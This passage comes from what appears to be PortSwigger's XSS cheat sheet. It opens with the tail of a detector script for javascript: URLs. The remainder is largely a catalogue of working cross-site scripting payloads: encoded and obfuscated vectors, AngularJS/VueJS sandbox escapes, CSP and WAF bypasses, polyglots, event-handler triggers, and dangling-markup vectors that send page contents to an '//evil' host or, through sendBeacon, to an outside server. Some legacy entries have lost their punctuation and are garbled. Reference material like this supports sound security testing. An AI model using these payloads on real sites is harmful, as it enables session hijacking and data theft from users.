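          ? NAMED_REFS[name]
          : match; // unknown name: leave it, as a parser would
      }
      const cp = parseInt(hex !== undefined ? hex : dec, hex !== undefined ? 16 : 10);
      return cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
    },
  );
}

// Normalise like the URL parser: drop leading \x01-\x20, then remove tab, LF
// and CR wherever they occur (the three characters the page says survive
// inside the scheme and before the colon).
function normaliseUrl(value) {
  return decodeRefs(value)
    .replace(/^[\x01-\x20]+/, '')
    .replace(/[\t\n\r]/g, '');
}

// Scheme comparison is case-insensitive (JaVaScript: is still javascript:).
function isJavaScriptUrl(value) {
  return /^javascript:/i.test(normaliseUrl(value));
}

// Scan a fragment for URL-bearing attributes and report those that resolve to
// javascript: after normalisation. Attribute list and regex are assumptions
// for this example, not a full HTML parser.
const URL_ATTRS = /\b(href|src|formaction|action|data|xlink:href)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;

function findJavaScriptUrls(html) {
  const hits = [];
  for (const m of html.matchAll(URL_ATTRS)) {
    const raw = m[2] ?? m[3] ?? m[4];
    if (isJavaScriptUrl(raw)) hits.push({ attr: m[1].toLowerCase(), value: raw });
  }
  return hits;
}

// Constructed sample: seven vectors drawn from the Protocols and Encoding
// sections plus two benign links that must not be flagged.
const SAMPLE_HTML = [
  '<a href=JaVaScript:alert(1)>XSS</a>',
  '<a href="\tjavascript:alert(1)">XSS</a>',
  '<a href="javas\tcript:alert(1)">XSS</a>',
  '<a href="&#106avascript:alert(1)">XSS</a>',
  '<a href="&#x0000006a;avascript:alert(1)">XSS</a>',
  '<a href="java&Tab;script&colon;alert&lpar;1&rpar;">XSS</a>',
  '<iframe src=javascript:alert(1)>',
  '<a href="https://portswigger.net/">safe</a>',
  '<a href="/docs?q=javascript:">safe</a>',
].join('\n');

if (typeof require !== 'undefined' && require.main === module) {
  for (const hit of findJavaScriptUrls(SAMPLE_HTML)) {
    console.log(`${hit.attr} -> ${JSON.stringify(hit.value)}`);
  }
}
```

A space inside the scheme (as opposed to tab, LF or CR) is not stripped by the parser, so `j avascript:` is correctly left unflagged; that is why the page's "without semicolon" vectors use a tab after the entity.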
Obfuscation
Data protocol inside script src with base64
<script src=data:text/javascript;base64,YWxlcnQoMSk=></script>
Data protocol inside script src with base64 and HTML entities
<script src="data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&#x6f;&#x4d;&#x53;&#x6b;&#x3d;"></script>
Data protocol inside script src with base64 and URL encoding
<script src="data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d"></script>
Iframe srcdoc HTML encoded
<iframe srcdoc="&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;"></iframe>
Iframe JavaScript URL with HTML and URL encoding
<iframe src="javascript:&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;"></iframe>
SVG script with unicode escapes and HTML encoding
<svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>
Client-side template injection
VueJS reflected
Version | Author | Length | Vector
All versions | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
All versions | Mario Heiderich (Cure53) & Sebastian Lekies (Google), Eduardo Vela Nava (Google), Krzysztof Kotowicz (Google) | 62 | <div v-html="''.constructor.constructor('alert(1)')()">a</div>
All versions | Gareth Heyes (PortSwigger) | 39 | <x v-html=_c.constructor('alert(1)')()>
All versions | Peter af Geijerstam (Swedish Shellcode Factory) | 37 | <x v-if=_c.constructor('alert(1)')()>
AngularJS sandbox escapes reflected
Version | Author | Length | Vector
1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
1.0.1 - 1.1.5 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33 | {{$on.constructor('alert(1)')()}}
1.2.0 - 1.2.1 | Jan Horn (Google) | 122 | {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
1.2.2 - 1.2.5 | Gareth Heyes (PortSwigger) | 23 | )))alert(1)
1.2.6 - 1.2.18 | Jan Horn (Google) | 106 | {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 124 | {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
1.2.24 - 1.2.29 | Gareth Heyes (PortSwigger) | 23 | )))alert(1)
1.2.27 - 1.2.29, 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 23 | )))alert(1)
1.3.0 | Gábor Molnár (Google) | 272 | {{!ready && (ready = true) && ( !call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (''+''.toString( 'F = Function.prototype;' + 'F.apply = F.a;' + 'delete F.a;' + 'delete F.valueOf;' + 'alert(1);' )))}}
1.3.3 - 1.3.18 | Gareth Heyes (PortSwigger) | 128 | {{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=''.valueOf;$eval('x=alert(1)//');}}
1.3.19 | Gareth Heyes (PortSwigger) | 102 | {{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(1)//');}}
1.3.20 | Gareth Heyes (PortSwigger) | 65 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
1.4.0 - 1.4.9 | Gareth Heyes (PortSwigger) | 74 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
1.5.0 - 1.5.8 | Ian Hickey & Gareth Heyes (PortSwigger) | 79 | {{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(1)');}}
1.5.9 - 1.5.11 | Jan Horn (Google) | 517 | {{ c=''.sub.call;b=''.sub.bind;a=''.sub.apply; c.$apply=$apply;c.$eval=b;op=$root.$$phase; $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString; C=c.$apply(c);$root.$$phase=op;$root.$digest=od; B=C(b,c,b);$evalAsync(" astNode=pop();astNode.type='UnaryExpression'; astNode.operator='(window.X?void0:(window.X=true,alert(1)))+'; astNode.argument={type:'Identifier',name:'foo'}; "); m1=B($$asyncQueue.pop().expression,null,$root); m2=B(C,null,m1);[].push.apply=m2;a=''.sub; $eval('a(b.c)');[].push.apply=a; }}
>=1.6.0 | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
>=1.6.0 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33 | {{$on.constructor('alert(1)')()}}
DOM based AngularJS sandbox escapes (using orderBy or no $eval)
Version | Author | Length | Vector
1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 37 | constructor.constructor('alert(1)')()
1.2.0 - 1.2.18 | Jan Horn (Google) | 118 | a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()
1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 119 | toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)
1.2.24 - 1.2.26 | Gareth Heyes (PortSwigger) | 317 | {}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]['z']=constructor.defineProperty;d={}[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']]['y'].value('alert(1)')()
1.2.27 - 1.2.29, 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 20 | )))alert(1)
1.4.0 - 1.4.5 | Gareth Heyes (PortSwigger) | 75 | 'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';
>=1.6.0 | Mario Heiderich (Cure53) | 37 | constructor.constructor('alert(1)')()
1.4.4 (without strings) | Gareth Heyes (PortSwigger) | 134 | toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)
AngularJS CSP bypasses
Version | Author | Length | Vector
All versions (Chrome) | Gareth Heyes (PortSwigger) | 81 | <input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">
All versions (Chrome), shorter | Gareth Heyes (PortSwigger) | 56 | <input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>
All versions (all browsers), shorter | Gareth Heyes (PortSwigger) | 91 | <input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">
1.2.0 - 1.5.0 | Eduardo Vela (Google) | 190 | <div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>
All versions (Chrome), shorter, via oncut | Savan Gadhiya (NotSoSecure) | 49 | <input ng-cut=$event.path|orderBy:'(y=alert)(1)'>
Scriptless attacks
Dangling markup
Background attribute
<body background="//evil?
<table background="//evil?
<table><thead background="//evil?
<table><tbody background="//evil?
<table><tfoot background="//evil?
<table><td background="//evil?
<table><th background="//evil?
Link href stylesheet
<link rel=stylesheet href="//evil?
Link href icon
<link rel=icon href="//evil?
Meta refresh
<meta http-equiv="refresh" content="0; http://evil?
Img to pass markup through src attribute
<img src="//evil?
<image src="//evil?
Video using track element
<video><track default src="//evil?
Video using source element and src attribute
<video><source src="//evil?
Audio using source element and src attribute
<audio><source src="//evil?
Input src
<input type=image src="//evil?
Button using formaction
<form><button style="width:100%;height:100%" type=submit formaction="//evil?
Input using formaction
<form><input type=submit value="XSS" style="width:100%;height:100%" type=submit formaction="//evil?
Form using action
<button form=x style="width:100%;height:100%;"><form id=x action="//evil?
Object data
<object data="//evil?
Iframe src
<iframe src="//evil?
Embed src
<embed src="//evil?
Use textarea to consume markup and post to external site
<form><button formaction=//evil>XSS</button><textarea name=x>
Pass markup data through window.name using formtarget
<button form=x>XSS</button><form id=x action=//evil/ target='
Pass markup data through window.name using base target
<a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="
Pass markup data through window.name using formtarget
<form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="
Using base href to pass data
<a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/
Using embed window name to pass data from the page
<embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using iframe window name to pass data from the page
<iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using object window name to pass data from the page
<object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using frame window name to pass data from the page
<frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Overwrite type attribute with image in hidden inputs
<input type=hidden type=image src="//evil?
Polyglots
Polyglot payload 1
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
Polyglot payload 2
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
Polyglot payload 3
javascript:/*--></title></style></textarea></script></xmp><details/open/ontoggle='+/`/+/onmouseover=1/+/[*/[]/+alert(/@PortSwiggerRes/)//'>
WAF bypass global objects
XSS into a JavaScript string string concatenation(window)
window[ale+rt](window[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(self)
self[ale+rt](self[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(this)
this[ale+rt](this[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(top)
top[ale+rt](top[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(parent)
parent[ale+rt](parent[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(frames)
frames[ale+rt](frames[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(globalThis)
globalThis[ale+rt](globalThis[doc+ument][dom+ain])
XSS into a JavaScript string comment syntax(window)
window[fooalertbar](window[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (self) self[fooalertbar](self[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (this) this[fooalertbar](this[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (top) top[fooalertbar](top[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(parent)
parent[fooalertbar](parent[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(frames)
frames[fooalertbar](frames[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(globalThis)
globalThis[fooalertbar](globalThis[foodocumentbar][domain])
XSS into a JavaScript string hex escape sequence(window)
window[x61x6cx65x72x74](window[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(self)
self[x61x6cx65x72x74](self[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(this)
this[x61x6cx65x72x74](this[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(top)
top[x61x6cx65x72x74](top[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(parent)
parent[x61x6cx65x72x74](parent[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(frames)
frames[x61x6cx65x72x74](frames[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(globalThis)
globalThis[x61x6cx65x72x74](globalThis[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string, hex escape sequence and base64 encoded string (window) | window['\x65\x76\x61\x6c'](window['\x61\x6c\x65\x72\x74'](window['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (self) | self['\x65\x76\x61\x6c'](self['\x61\x6c\x65\x72\x74'](self['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (this) | this['\x65\x76\x61\x6c'](this['\x61\x6c\x65\x72\x74'](this['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (top) | top['\x65\x76\x61\x6c'](top['\x61\x6c\x65\x72\x74'](top['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (parent) | parent['\x65\x76\x61\x6c'](parent['\x61\x6c\x65\x72\x74'](parent['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (frames) | frames['\x65\x76\x61\x6c'](frames['\x61\x6c\x65\x72\x74'](frames['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (globalThis) | globalThis['\x65\x76\x61\x6c'](globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, octal escape sequence (window) | window['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (self) | self['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (this) | this['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (top) | top['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (parent) | parent['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (frames) | frames['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (globalThis) | globalThis['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, unicode escape (window) | window['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (self) | self['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (this) | this['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (top) | top['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (parent) | parent['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (frames) | frames['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (globalThis) | globalThis['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, RegExp source property (window) | window[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (self) | self[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (this) | this[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (top) | top[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (parent) | parent[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (frames) | frames[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (globalThis) | globalThis[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string HieroglyphyJSFuck(window)
window[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(self)
self[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(this)
this[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(top)
top[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(parent)
parent[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(frames)
frames[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(globalThis)
globalThis[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
Classic vectors (XSS crypt)
Image src with JavaScript protocol | <img src="javascript:alert(1)">
Body background with JavaScript protocol | <body background="javascript:alert(1)">
Iframe data URLs no longer work, as modern browsers use a null origin | <iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">
Impossible labs
Title | Description | Length limit | Closest vector
Basic context, WAF blocks <[a-zA-Z] | This lab captures the scenario when you can't use an open tag followed by an alphanumeric character. Sometimes you can solve this problem by bypassing the WAF entirely, but what about when that's not an option? Certain versions of .NET have this behaviour and it's only known to be exploitable in old IE with <%tag. | N/A | N/A
Script based injection but quotes, forward slash and backslash are escaped | We often encounter this situation in the wild: you have an injection inside a JavaScript variable and can inject angle brackets, but quotes and forward/backslashes are escaped, so you can't simply close the script block. The closest we've got to solving this is when you have multiple injection points: the first within a script based context and the second in HTML. | N/A | N/A
innerHTML context but no equals allowed | You have a site that processes the query string and URL decodes the parameters, but splits on the equals and then assigns to innerHTML. In this context <script> doesn't work and we can't use = to create an event. | N/A | N/A
Basic context, length limit | This lab's injection occurs within the basic HTML context but has a length limitation of 15. Filedescriptor came up with a vector that could execute JavaScript in 16 characters, <q oncut=alert``>, but can you beat it? | 15 | <q oncut=alert``>
Attribute context, length limit | The context of this lab is inside an attribute with a length limitation of 14 characters. We came up with a vector that executes JavaScript in 15 characters: oncut=alert``+ (the plus is a trailing space). Do you think you can beat it? | 14 | oncut=alert`` (followed by a trailing space)
Basic context, length limit, arbitrary code | It's all well and good executing JavaScript, but if all you can do is call alert, what use is that? In this lab we demonstrate the shortest possible way to execute arbitrary code. | 19 | <q oncut=eval(name)>
Attribute context, length limit, arbitrary code | Again, calling alert proves you can call a function, but we created another lab to find the shortest possible attribute based injection with arbitrary JavaScript. | 17 | See link
Injection occurs inside a frameset but before the body | We received a request from Twitter about this next lab. It occurs within a frameset but before a body tag, with equals filtered. You would think you could inject a closing frameset followed by a script block, but that would be too easy. | N/A | N/A
Injection occurs inside a single quoted string, only the characters a-z0-9+` are allowed | The injection occurs within a single quoted string and the challenge is to execute arbitrary code using the charset a-zA-Z0-9+`. | N/A | N/A
VBScript protocol used to work in IE | <a href="vbscript:MsgBox+1">XSS</a> <a href=# onclick="vbs:Msgbox+1">XSS</a> <a href=# onclick="VBS:Msgbox+1">XSS</a> <a href=# onclick="vbscript:Msgbox+1">XSS</a> <a href=# onclick="VBSCRIPT:Msgbox+1">XSS</a> <a href=# language=vbs onclick="vbscript:Msgbox+1">XSS</a>
JScript compact was a minimal version of JS that wasn't widely used in IE | <a href=# onclick="jscript.compact:alert(1);">test</a> <a href=# onclick="JSCRIPT.COMPACT:alert(1);">test</a>
JScript.Encode allows encoded JavaScript | <a href=# language=JScript.Encode onclick="#@~^CAAAAA==C^+D`8mgIAAA==^#~@">XSS</a> <a href=# onclick="JScript.Encode:#@~^CAAAAA==C^+D`8mgIAAA==^#~@">XSS</a>
VBScript.Encode allows encoded VBScript | <iframe onload="VBScript.Encode:#@~^CAAAAA==ko$K6FoQIAAA==^#~@"> <iframe language=VBScript.Encode onload="#@~^CAAAAA==ko$K6FoQIAAA==^#~@">
JavaScript entities used to work in Netscape Navigator | <a title="&{alert(1)}">XSS</a>
JavaScript stylesheets used to be supported by Netscape Navigator | <link href="xss.js" rel=stylesheet type="text/javascript">
Button used to consume markup | <form><button name=x formaction=x><b>stealme
IE9 select elements and plaintext used to consume markup | <form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>
XBL Firefox only lt= 2 ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindin67url(businessinfocouklab sxblxblxmlxss)gt ltdiv style=-moz-bindinampx5c67url(businessinfocouklab sxblxblxmlxss)gt
XBL also worked in FF35 using data urls ltimg src=blah style=-moz-binding url(datatextxmlcharset=utf-83C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E) gt
CSS expressions (IE7 and earlier) | <div style=xss:expression(alert(1))> <div style=xss:expression(1)-alert(1)> <div style=xss:expressio\6e(alert(1))> <div style=xss:expressio\006e(alert(1))> <div style=xss:expressio\00006e(alert(1))> <div style=xss:expressio&#x5c;6e(alert(1))>
In quirks mode IE allowed you to use = instead of : | <div style=xss=expression(alert(1))> <div style="color&#x3d;red">test</div>
Behaviors for older modes of IE | <a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>
Older versions of IE supported event handlers in functions | <script>function window.onload(){alert(1)}</script> <script>function window::onload(){alert(1)}</script> <script>function window.location(){}</script> <body><script>function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML(){}</script></body> <body><script>function document.body.innerHTML(){x='<img src=1 onerror=alert(1)>'}</script></body>
GreyMagic HTML+time exploit (no longer works, even in 5 docmode) | <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"></BODY></HTML>
Firefox allows NULLS after amp lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt
Firefox allows NULLs inside named entities lta href=javascriptampcolonalert(1)gtFirefoxltagt
Firefox allows NULL characters inside openingcomments
lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt
Safari used to allow any tag to have an onload event inside SVG | <svg><xss onload=alert(1)>
Isindex using src attribute | <isindex type=image src=//evil?>
Isindex using submit | <isindex type=submit style=width:100%;height:100%; value=XSS formaction=//evil?>
Isindex and formaction | <isindex type=submit formaction=javascript:alert(1)>
Isindex and action | <isindex type=submit action=javascript:alert(1)>
Credits
Brought to you by PortSwigger, lovingly constructed by Gareth Heyes.
This cheat sheet wouldn't be possible without the web security community who share their research. Big thanks to James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a, Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski, SØᴘᴀS, avanish46, Juuso Käenmäki, jinmo123, itszn13, Martin Bajanik, David Granqvist, Andrea (theMiddle) Menin, simps0n, hahwul, Paweł Hałdrzyński, Jun Kokatsu, RenwaX23, sratarun, har1sec, Yann C., gadhiyasavan, p4fg, diofeher.
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request.
Event handlers that do not require user interaction (continued)
Event | Description | Code
onscroll | Fires when the page scrolls | <body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>
onstart | Fires when the marquee starts | <marquee onstart=alert(1)>XSS</marquee>
ontimeupdate | Fires when the timeline is changed | <audio controls autoplay ontimeupdate=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
ontoggle | Fires when the details tag is expanded | <details ontoggle=alert(1) open>test</details>
ontransitioncancel | Fires when a CSS transition cancels | <style>:target {color: red;}</style><xss id=x style="transition:color 10s" ontransitioncancel=alert(1)></xss>
ontransitionend | Fires when a CSS transition ends | <style>:target {color:red;}</style><xss id=x style="transition:color 1s" ontransitionend=alert(1)></xss>
ontransitionrun | Fires when a CSS transition begins | <style>:target {transform: rotate(180deg);}</style><xss id=x style="transition:transform 2s" ontransitionrun=alert(1)></xss>
ontransitionstart | Fires when a CSS transition starts | <style>:target {color:red;}</style><xss id=x style="transition:color 1s" ontransitionstart=alert(1)></xss>
onunhandledrejection | Fires when a rejected promise isn't handled | <body onunhandledrejection=alert(1)><script>fetch('//xyz')</script>
onunload | Fires when the page is unloaded | <body onunload=navigator.sendBeacon('https://ssl.portswigger-labs.net/',document.body.innerHTML)>
onwaiting | Fires while the media element is waiting for data | <video autoplay controls onwaiting=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
onwebkitanimationend | Fires when a CSS animation ends | <style>@keyframes x{}</style><xss style="animation-name:x" onwebkitanimationend="alert(1)"></xss>
onwebkitanimationiteration | Fires when a CSS animation repeats | <style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onwebkitanimationiteration="alert(1)"></xss>
onwebkitanimationstart | Fires when a CSS animation starts | <style>@keyframes x{}</style><xss style="animation-name:x" onwebkitanimationstart="alert(1)"></xss>
onwebkittransitionend | Fires when a CSS transition ends | <style>:target {color:red;}</style><xss id=x style="transition:color 1s" onwebkittransitionend=alert(1)></xss>
Event handlers that do require user interaction
Event | Description | Code
onauxclick | Fires when right clicking or using the middle button of the mouse | <input onauxclick=alert(1)>
onbeforecopy | Requires you to copy a piece of text | <a onbeforecopy=alert(1) contenteditable>test</a>
onbeforecut | Requires you to cut a piece of text | <a onbeforecut=alert(1) contenteditable>test</a>
onbeforepaste | Requires you to paste a piece of text | <a onbeforepaste=alert(1) contenteditable>test</a>
onchange | Requires a change of value | <input onchange=alert(1) value=xss>
onclick | Requires a click on the element | <xss onclick=alert(1)>test</xss>
onclose | Fires when a dialog is closed | <dialog open onclose=alert(1)><form method=dialog><button>XSS</button></form>
oncontextmenu | Triggered when right clicking to show the context menu | <xss oncontextmenu=alert(1)>test</xss>
oncopy | Requires you to copy a piece of text | <xss oncopy=alert(1) value=XSS autofocus tabindex=1>test
oncut | Requires you to cut a piece of text | <xss oncut=alert(1) value=XSS autofocus tabindex=1>test
ondblclick | Triggered when double clicking the element | <xss ondblclick=alert(1) autofocus tabindex=1>test</xss>
ondrag | Triggered when dragging the element | <xss draggable=true ondrag=alert(1)>test</xss>
ondragend | Triggered when dragging of the element is finished | <xss draggable=true ondragend=alert(1)>test</xss>
